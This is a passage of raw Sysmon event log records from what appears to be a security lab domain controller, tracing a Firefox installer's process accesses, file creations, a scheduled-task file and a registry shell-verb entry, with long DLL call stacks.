dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000016432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\InvokeShellVerb.dll2021-01-18 13:59:53.567 13241300x800000000000000016431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500_Classes\*\shell\Firefox-308046B0AF4A39CB\ExplorerCommandHandler{90AA3A4E-1CBA-4233-B8BB-535773D48449} 10341000x800000000000000016430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+345c25(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64)|C:\Windows\System32\SHELL32.dll+345ae4(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64)|C:\Windows\System32\SHELL32.dll+345ae4(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64) 10341000x800000000000000016423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+387643(wow64)|C:\Windows\System32\windows.storage.dll+382764(wow64)|C:\Windows\System32\SHELL32.dll+345ae4(wow64) 10341000x800000000000000016422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64)|C:\Windows\System32\SHELL32.dll+345a77(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64)|C:\Windows\System32\SHELL32.dll+345a77(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\ApplicationID.dll+79cb(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000016420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64) 10341000x800000000000000016419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+c4c36(wow64)|C:\Windows\System32\windows.storage.dll+c4b5d(wow64)|C:\Windows\System32\windows.storage.dll+38780a(wow64)|C:\Windows\System32\windows.storage.dll+382ab5(wow64)|C:\Windows\System32\SHELL32.dll+345a77(wow64) 11241100x800000000000000016418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:59:53.521{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB2021-01-18 13:59:53.521 11241100x800000000000000016417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT10532021-01-18 13:59:53.521{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Mozilla2021-01-18 13:59:53.521 10341000x800000000000000016416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.521{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.521{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-9459-6005-3005-00000000A301}6708C:\Program Files\Mozilla Firefox\default-browser-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 